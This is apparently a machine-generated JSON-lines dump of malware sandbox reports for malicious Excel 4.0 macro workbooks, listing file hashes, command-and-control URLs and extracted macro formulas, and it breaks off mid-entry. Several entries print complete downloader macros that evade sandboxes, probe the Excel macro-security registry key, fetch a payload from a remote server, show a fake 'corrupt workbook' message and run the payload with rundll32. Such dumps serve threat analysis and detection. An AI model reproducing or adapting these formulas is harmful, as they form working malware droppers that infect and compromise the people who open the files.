{"version":"0.2","sample":{"sample":"","kind":"file","target":"119b6afafb9012309d8ab1bbfa075a5423e9a28dfc33e9c25eaa11ff6318bd6b"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"119b6afafb9012309d8ab1bbfa075a5423e9a28dfc33e9c25eaa11ff6318bd6b","filesize":206336,"md5":"78a071c0d5e2c8b6fc24f248d0ec7df4","sha1":"84d74df616d4a109e4309330ec64321892433262","sha256":"119b6afafb9012309d8ab1bbfa075a5423e9a28dfc33e9c25eaa11ff6318bd6b","sha512":"361d2cc879cbc1e1192a506f1d60f168d17d92335801fa71dd608a9a5be145f0f53cf6a99ad0e2415f2e94e83213ce57d04dc69ca92901e4615b6a808ed88613","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"119b6afafb9012309d8ab1bbfa075a5423e9a28dfc33e9c25eaa11ff6318bd6b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tZyEhoVYjG\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"11bfedf2d55c89d87784923ec2f999920d98f1e8adad319be83bb2a2b6dd82fb"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"11bfedf2d55c89d87784923ec2f999920d98f1e8adad319be83bb2a2b6dd82fb","filesize":214528,"md5":"d8b0288689c3ed0f8a1477c0c7b99c87","sha1":"7144bbd3740940a1a0d478294a10ea9620b97849","sha256":"11bfedf2d55c89d87784923ec2f999920d98f1e8adad319be83bb2a2b6dd82fb","sha512":"367f2ec7f98302867bb86f00b0633f5037335849bb777c33b8a745fbae6ad895065293536008e57d0acf363a245c076de00501cfab98fe1896ee6569cb58badc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"11bfedf2d55c89d87784923ec2f999920d98f1e8adad319be83bb2a2b6dd82fb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"a8QYKxKDPY\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"11c22c38948565174846c5bf689070b15e3097ace3741ae77b500cf4cc954e34"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"11c22c38948565174846c5bf689070b15e3097ace3741ae77b500cf4cc954e34","filesize":185344,"md5":"9c430c3fce64f2d73e9865ec7ed51416","sha1":"fc59c2021ca4586395f373bb212a4470d7d32422","sha256":"11c22c38948565174846c5bf689070b15e3097ace3741ae77b500cf4cc954e34","sha512":"a5699e2e4ca52dcd81884dc6d9c93c9692510a7dfcdc191baa1b3bbb2aff57cd7a8e10679346496a88b248aebbf602b9fae74ac9e6e1974e20b953b0ec2c8c3b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"11c22c38948565174846c5bf689070b15e3097ace3741ae77b500cf4cc954e34.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"11d9c10dfed55f0fb739c4c35ca0df0fc8c31b55a6d7b69960816ee9de40b8af"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"11d9c10dfed55f0fb739c4c35ca0df0fc8c31b55a6d7b69960816ee9de40b8af","filesize":112128,"md5":"5b505fa98b17ec583e1430b4b4631f5a","sha1":"4eb72ec23bd1276f04234ffeaeaecb43c1232331","sha256":"11d9c10dfed55f0fb739c4c35ca0df0fc8c31b55a6d7b69960816ee9de40b8af","sha512":"de80c63413b41bf407c1cd991cbd67838a1cc40310b19b6db0538db03a1422239dc56b9332494eb8fc713c5e88c152005853f3ce428e7b8eaefd7183550dae3e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"11d9c10dfed55f0fb739c4c35ca0df0fc8c31b55a6d7b69960816ee9de40b8af.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"11e1d13271275c1f97ffeb74a56aa4c21de768f66686bbf7f84a7468f325a509"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"11e1d13271275c1f97ffeb74a56aa4c21de768f66686bbf7f84a7468f325a509","filesize":206336,"md5":"ff2f07b47668346a6a9f57cca141813c","sha1":"34440a7d5660085c276e1154ccd04c7d57ea8748","sha256":"11e1d13271275c1f97ffeb74a56aa4c21de768f66686bbf7f84a7468f325a509","sha512":"3443db59c1e6361437d6f32adf5456232d8aa47652d7e0ba7956b7ccab895d6eb5394979532c980c7de95b34c8071830e50bda8217a19fafd5895108e7ab6167","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"11e1d13271275c1f97ffeb74a56aa4c21de768f66686bbf7f84a7468f325a509.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"r8EaQHb9eW\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"11ea364c3706b7a5c59425db874db63e2284c7075f3d0e7deaa2edbe82010d2b"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"11ea364c3706b7a5c59425db874db63e2284c7075f3d0e7deaa2edbe82010d2b","filesize":160768,"md5":"99428d0244ad813fb06c06c02fee546b","sha1":"01010d9517da8a150225a85406cda6658292ddb4","sha256":"11ea364c3706b7a5c59425db874db63e2284c7075f3d0e7deaa2edbe82010d2b","sha512":"fab8bb22ec8e966923c72e6b66442e5c53483c02d26cfae4c9c28cd85ff77c206add834b6f13668789e3348b942f60ffcb61d62acdf47e571adb23dabdd8abbc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"11ea364c3706b7a5c59425db874db63e2284c7075f3d0e7deaa2edbe82010d2b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HcE3RZ2gMg\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"122a5ee6dfbadb2d146b2a4e306fe0461427d08e1b5caa0202b3b56c65f10b39"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"122a5ee6dfbadb2d146b2a4e306fe0461427d08e1b5caa0202b3b56c65f10b39","filesize":145920,"md5":"c5698f5c3fd8b32f37c17c9c3c74abba","sha1":"ed409451866b05a4efc82f91234578a1f9072afc","sha256":"122a5ee6dfbadb2d146b2a4e306fe0461427d08e1b5caa0202b3b56c65f10b39","sha512":"23bd8cd025575a5064358c3eae70f52bfea03ae7fceb9f7807d8ecd0769e6f55d19b4590372a526867eff39b7fb96e3dfd8b1ea931ea165449aae3ee2d9274d4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"122a5ee6dfbadb2d146b2a4e306fe0461427d08e1b5caa0202b3b56c65f10b39.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"Enn7oDJQbi\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1231ce8d3ee17d6243e969ae5b7f627106181c3863a570bfae73fbaa82ee7a88"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"1231ce8d3ee17d6243e969ae5b7f627106181c3863a570bfae73fbaa82ee7a88","filesize":185344,"md5":"3ff26ad605cc6e9720af69b48fbb92a3","sha1":"31f5f6651c02a7bf112598d54ba94dcaddae7332","sha256":"1231ce8d3ee17d6243e969ae5b7f627106181c3863a570bfae73fbaa82ee7a88","sha512":"1307d539e04fd4b470ce5bf39394c428c7ae70c6f94e08dd82f95d030e7cc02a7c4819ccc186fbc9365cfd686581b4f47a9a6da420b4d132b1d63071d9742053","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1231ce8d3ee17d6243e969ae5b7f627106181c3863a570bfae73fbaa82ee7a88.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1240c87ac0e1728dba273073beb74fc0477917a7463a6fafd58d1f300c1c6c13"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"1240c87ac0e1728dba273073beb74fc0477917a7463a6fafd58d1f300c1c6c13","filesize":104448,"md5":"a9f92383a5bbace993844eb21e2e2883","sha1":"fe545df778df683cc1e5dc1c625f083d471f2415","sha256":"1240c87ac0e1728dba273073beb74fc0477917a7463a6fafd58d1f300c1c6c13","sha512":"1254872a35e67a30a15e02ae847b6dccb6c245e1ace0a0630ee17c94337fd7e3e59443e23f7120f098b09228ca6d57e4b1565fae4966eba91e8f1a287413ba98","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1240c87ac0e1728dba273073beb74fc0477917a7463a6fafd58d1f300c1c6c13.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"2egaRwSlkM\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"124fd0ae557010f570fd8367e89b3b2e0751191d588ec7699d19fe763586e3c9"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"124fd0ae557010f570fd8367e89b3b2e0751191d588ec7699d19fe763586e3c9","filesize":209920,"md5":"a7a58600378d84477f093e4c179d6791","sha1":"65bf18a4d84d242319309e0091798270c982b8d1","sha256":"124fd0ae557010f570fd8367e89b3b2e0751191d588ec7699d19fe763586e3c9","sha512":"7354defa5ec0205fe2d429bd16e5c4242de48b66d2b1ac03c456ac1d4a5090f6e73ab20c7dbde1c687be8bab59058aed229ec87122fe177b001282504899c443","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"124fd0ae557010f570fd8367e89b3b2e0751191d588ec7699d19fe763586e3c9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"J6UW4TuCZ3\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"125d3092c7b7a2af3ded73ab737baf5309f7947b98346919cbc58896c1f15949"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"125d3092c7b7a2af3ded73ab737baf5309f7947b98346919cbc58896c1f15949","filesize":144384,"md5":"f79e3c35905c1d31176a1bf43aacde61","sha1":"fc464b055966c9f67b9b382ce4cc1c5d81f69bcb","sha256":"125d3092c7b7a2af3ded73ab737baf5309f7947b98346919cbc58896c1f15949","sha512":"e0759abaf25d321c8530f4433ad514a2e6e69899bf238d5af9bd39d28781050d52453f5d8b8c04d983f6c64aeb4a53b10b46ee1d5db2783682121ccc4cb487b4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"125d3092c7b7a2af3ded73ab737baf5309f7947b98346919cbc58896c1f15949.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"NYc2YtKZB7\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1266f2e2bc66b677295913ff5e9d6d80437af0f4609f02e0920564e775854c76"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"1266f2e2bc66b677295913ff5e9d6d80437af0f4609f02e0920564e775854c76","filesize":209920,"md5":"f45cc01f3524dbcaef517a63c06cf3ce","sha1":"97ee81782dbc7f3f7374a4e0e774734bb90ef1b2","sha256":"1266f2e2bc66b677295913ff5e9d6d80437af0f4609f02e0920564e775854c76","sha512":"f6fc1a3be8a31a6d5786b642f6a35004b0bf3ac11cd8273f3053a34638d780a4ca30fbb0831fb0a0b4cfb8985c7b6f227914fe62f0cc9cb6261c2e82978d24c2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1266f2e2bc66b677295913ff5e9d6d80437af0f4609f02e0920564e775854c76.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"raazxanWOk\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"12731ba1099325bfbeba9741308aee14b782a75ecffd7aa5818333c36b080363"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"12731ba1099325bfbeba9741308aee14b782a75ecffd7aa5818333c36b080363","filesize":170496,"md5":"2b854e73198a50b990106e0fdd01c209","sha1":"424740a422a0b19d64f40aa61aa89e41f7a9c814","sha256":"12731ba1099325bfbeba9741308aee14b782a75ecffd7aa5818333c36b080363","sha512":"4a48d32115b093f2d6700ee840cbc6c419deb4ed0eb975a4e7ebc1a4fc9b4c989d1db23403d538f386d0f5fca31c8d27999c645b996a97def789f319a9f40e36","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"12731ba1099325bfbeba9741308aee14b782a75ecffd7aa5818333c36b080363.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"e0XuIOYfpm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1288edef946d821919487cace3b0b7d69d33bcbffe144b3bc59573b1dab3f081"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"1288edef946d821919487cace3b0b7d69d33bcbffe144b3bc59573b1dab3f081","filesize":170496,"md5":"d0d791661de9d59b57d3f3a5f994f291","sha1":"26fcdd3b0954713cd6f9be7d7e4b6e70cb64b0d0","sha256":"1288edef946d821919487cace3b0b7d69d33bcbffe144b3bc59573b1dab3f081","sha512":"ce61aa98f52fff54209643e1729c03fc8402f46f0962de49e2e125d7eb2ba266f979d15f6f2a521b0c26a21aa49935c565f9f5f1d13a93d0e0fb74d206bb7824","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1288edef946d821919487cace3b0b7d69d33bcbffe144b3bc59573b1dab3f081.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Hd688tfSKD\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"129366d2e189cfe65bc3d400ca75a64424b3b9385b8a83001d4bcb5e9ea0e72b"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"129366d2e189cfe65bc3d400ca75a64424b3b9385b8a83001d4bcb5e9ea0e72b","filesize":214016,"md5":"41c5557e46b59f595a3f9defcfacbe1c","sha1":"f4508fce195a07b6dbdaeb3781fa2db46e4659c1","sha256":"129366d2e189cfe65bc3d400ca75a64424b3b9385b8a83001d4bcb5e9ea0e72b","sha512":"403fe6d88fcb6837a660853008b90fa532b4a76319d802dc5e7e2a72aca8db8fffdff9a79adfde4e79e9c04bab2b1d161ca5cbea7a5f2e643b044d8a4c91755e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"129366d2e189cfe65bc3d400ca75a64424b3b9385b8a83001d4bcb5e9ea0e72b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 